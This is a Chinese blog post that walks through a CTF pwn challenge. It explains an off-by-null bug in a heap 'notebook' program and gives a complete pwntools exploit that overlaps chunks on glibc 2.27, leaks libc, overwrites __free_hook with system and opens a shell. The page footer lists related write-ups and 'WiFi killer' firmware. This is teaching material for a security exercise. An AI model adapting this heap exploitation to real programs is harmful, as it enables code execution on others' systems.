[BUUCTF-pwn] 西湖论剑_2018_小陈的笔记本加强版

最新推荐文章于 2023-02-18 18:38:53 发布
最新推荐文章于 2023-02-18 18:38:53 发布
阅读量309 收藏
点赞数
分类专栏: CTF pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/122304754
版权

难度到是没啥难度,需要设计一下块的布置。

菜单题,有add,free,居然还有edit和show(这个很少见了),管理块0x90,在0x70放size和ptr,这样控制ptr就基本OK了。

漏洞点:

readnb函数有off_by_null

unsigned __int64 __fastcall sub_400B8B(__int64 a1, int a2)
{
  char buf; // [rsp+1Fh] [rbp-11h] BYREF
  int i; // [rsp+20h] [rbp-10h]
  int v5; // [rsp+24h] [rbp-Ch]
  unsigned __int64 v6; // [rsp+28h] [rbp-8h]

  v6 = __readfsqword(0x28u);
  for ( i = 0; i < a2; ++i )
  {
    v5 = read(0, &buf, 1uLL);
    if ( v5 < 0 )
      exit(1);
    if ( buf == 10 )
    {
      *(_BYTE *)(i + a1) = 0;
      return __readfsqword(0x28u) ^ v6;
    }
    *(_BYTE *)(a1 + i) = buf;
  }
  *(_BYTE *)(i + a1) = 0;                       // off_by_null 多写一个0溢出
  return __readfsqword(0x28u) ^ v6;
}

然后就是布置一下块的放置,由于写后加了\0,所以无法直接用show需要造重叠块,2.27用tcache有传统套路 A0x430+B+C0x500 然后先freeA利用B的off_by_null将C的size 0x501改为0x500,在pre_size写上A+B,再freeC再建A后unsortbin的指针会落在B上,showB就得到libc

这个问题就在有管理块上,要在重叠后控制管理块就得让管理块落在重叠的数据块上,当edit里控制管理块的指针。

先建两个80各用,这个数据块跟管理块大小相同,free后可以放两个头,这样数据块会集中到一起,管理起来比较方便,得到unsort后建建420将unsort落到重叠区,这里把管理块建在这里就行了。

from pwn import *

'''
patchelf --set-interpreter /home/shi/pwn/libc6_2.27-3u1/lib64/ld-2.27.so pwn
patchelf --add-needed /home/shi/pwn/libc6_2.27-3u1/lib64/libc-2.27.so pwn
'''

elf = ELF('./pwn')
context.arch = 'amd64'

def connect():
    global p,libc_elf,one,libc_start_main_ret,local
    
    local = 0
    if local == 1:
        p = process('./pwn')
        libc_elf = ELF('/home/shi/pwn/libc6_2.27-3u1/lib64/libc-2.27.so')
        one = [0x4240e, 0x42462, 0xc4f7f, 0xe31fa, 0xe31ee]
        libc_start_main_ret = 0x21a87
    else:
        p = remote('node4.buuoj.cn', 26158) 
        libc_elf = ELF('../libc6_2.27-3ubuntu1_amd64.so')
        one = [0x4f2c5,0x4f322,0xe569f,0xe5858,0xe585f,0xe5863,0x10a398,0x10a38c]
        libc_start_main_ret = 0x21b97

menu = b">"
def add(name, size, msg):
    p.sendlineafter(menu, b'1')
    p.sendlineafter(b":", name)
    p.sendlineafter(b":", str(size).encode())
    p.sendlineafter(b":", msg)

def edit(idx, msg):
    p.sendlineafter(menu, b'2')
    p.sendlineafter(b":", str(idx).encode())
    p.sendafter(b":", msg)

def free(idx):
    p.sendlineafter(menu, b'4')
    p.sendlineafter(b':', str(idx).encode())

def show(idx):
    p.sendlineafter(menu, b'3')
    p.sendlineafter(b':', str(idx).encode())

def pwn():
    
    #0m 0d 1m 1d 
    #0m 2m 1m 3m   0d 2d 1d 3d
    add(b'A', 0x80, b'A') #0
    add(b'A', 0x80, b'A') #1
    free(0)
    add(b'A', 0x420, b'A') #0
    add(b'A', 0x88, b'A') #2
    free(1)
    add(b'A', 0x4f8, b'A') #1
    add(b'A', 0x20, b'A') #3

    free(0)
    edit(2, b'A'*0x80 + p64(0x90+0x430))
    free(1)
    add(b'A', 0x420, b'/bin/sh') #0
    
    #context.log_level = 'debug'
    show(2)
    
    libc_base = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - 0x60 -0x10 - libc_elf.sym['__malloc_hook']
    free_hook = libc_base + libc_elf.sym['__free_hook']
    system    = libc_base + libc_elf.sym['system']
    malloc_hook = libc_base + libc_elf.sym['__malloc_hook']
    realloc   = libc_base + libc_elf.sym['realloc']
    one_gadget= libc_base + one[0] 
    print('libc:', hex(libc_base))

    free(3)
    add(b'A', 0x80, b'A') #1
    add(b'A', 0x20, b'A') #3 3.m == 2.d
    
    edit(2, b'A'*0x70 + p64(8)+ p64(free_hook) + b'\n')
    edit(3, p64(system))
    
    free(0)
    #gdb.attach(p)
    #pause()

    p.sendline(b'cat /flag')
    p.interactive()

connect()
pwn()

坑:

本来看到got表部分保护就想着改got表,本地没问题但远程不行。没办法远程还是修改__free_hook

石氏是时试
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF:[Black Watch 入群题]PWN(write up)
qq_44768749的博客
08-23 798
BUUCTF:[Black Watch 入群题]PWN0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp0x06 栈迁移补充32位程序 0x01 文件分析 开启了栈不可执行 0x02 运行 运行一下没什么特殊的,猜测应该是栈溢出 0x03 IDA 虽然buf在栈上但输入的长度仅仅能够覆盖ebp和返回地址,但s在bss段,而且输入的长度也够长,因此想到了栈迁移,覆盖vul_function返回地址,使其到bss段上执行 0x04 思路 s在bss段上的地址为0
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
2020 西湖论剑 pwn noleakfmt
yongbaoii的博客
03-29 553
canary没开,方便溢出。 主逻辑简单。 格式化字符串漏洞。 给了我们一个栈地址,但是主要问题是把标准输出关掉了。 我们要利用的呢就是将_IO_2_1_stdout_的_fileno从1改成2,为啥呢? 对于一个FILE结构体来说,最重要的就是_flags和_fileno,_fileno存储的是我们的文件描述符,对于某些情况或许我们要劫持_fileno才能达到我们的目的,而_flags则标志了该FILE的一些行为,这对于我们的泄露至关重要。 我们想办法劫持结构体的_fileno之后就可以从标准错误做一.
pwn-2019西湖论剑之story
CharlesGodX的博客
04-09 751
0x00:前言 这道题是64位程序,涉及到canary绕过,格式化字符串漏洞,是一道非常好的练习题 0x01:题目思路 首先检查保护,可以看到有堆栈不可执行和canary保护 Thunder_J@Thunder_J-virtual-machine:~/桌面$ checksec story [*] '/home/Thunder_J/\xe6\xa1\x8c\xe9\x9d\xa2/story' ...
2021 西湖论剑 pwn blind
yongbaoii的博客
03-26 603
利用ret2csu,覆盖alarm的got表最低一字节,通过爆破劫持alarm为syscall。 通过read函数的返回值让rax为0x5b,执行execve("/bin/sh", 0, 0) exp #/usr/env/bin python from pwn import * import time context.log_level = "debug" gadget1 = 0x4007ba gadget2 = 0x4007a0 elf = ELF('./blind') read_got = el.
2023西湖论剑pwn 部分wp
cainiao78777的博客
02-18 651
也就是*(&v3 + i) = v0 修改一个字节的内容,但是我们也要解一下这个方程,以免程序被exit()而且在buf的下面的变量都是能够覆盖的,也就是说,我们能通过覆盖 i 的值进行数组溢出。一个格式化字符串漏洞,一个栈溢出,但是只能副盖rbp和返回地址,所有要考虑栈迁移。我看有个大佬的解法很奇特,准备学习一下,待我学成,再来补充另外一种方法。泄露出这个函数地址,就能得到 libc——base。根据距离rbp的距离将相应的变量填入。这里的main指的是start,第二次getshell。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
2022西湖论剑pwn部分wp
N1rvana的博客
02-05 855
西湖论剑2022pwn
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 410
buuctf-pwn 001-016题wp
buuctf-pwn write-ups (4)
CoLin的pwn小屋
06-12 476
buuctf 032-038题题解,重点关注038题 pwnable_orw
buuctf-pwn write-ups (2)
CoLin的pwn小屋
05-07 278
buuctf-pwn 017-026题wp,重点关注babyheap
BUUCTF-PWN-Writeup-1-5
feng的博客
01-20 3199
前言 开始刷一刷BuuctfPWN题,一遍学一遍刷题了。 其实主要是堆学的顶不住了。。。一个下午才搞懂一个知识点,太tm的难了。 test_your_nc from pwn import * from LibcSearcher import * context(log_level="debug",os="linux") p = remote('node4.buuoj.cn',27517) p.interactive() rip 坑。。。。 一个gets的栈溢出,后门函数fun()在0x401186,本
buuctf-pwn write-ups (3)
CoLin的pwn小屋
05-15 255
buuctf pwn 027-031题
buuctf-pwn write-ups (5)
CoLin的pwn小屋
06-17 236
buuctf-pwn 039~046题
buuctf-pwn write-ups (6)
CoLin的pwn小屋
06-24 1120
buuctf-pwn 047~053题,重点关注第53题的C++ pwn
buuctf-pwn write-ups (9)
CoLin的pwn小屋
07-04 219
buuctf-pwn 067~072题题解
buuctf [HarekazeCTF2019]baby_rop2
最新发布
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值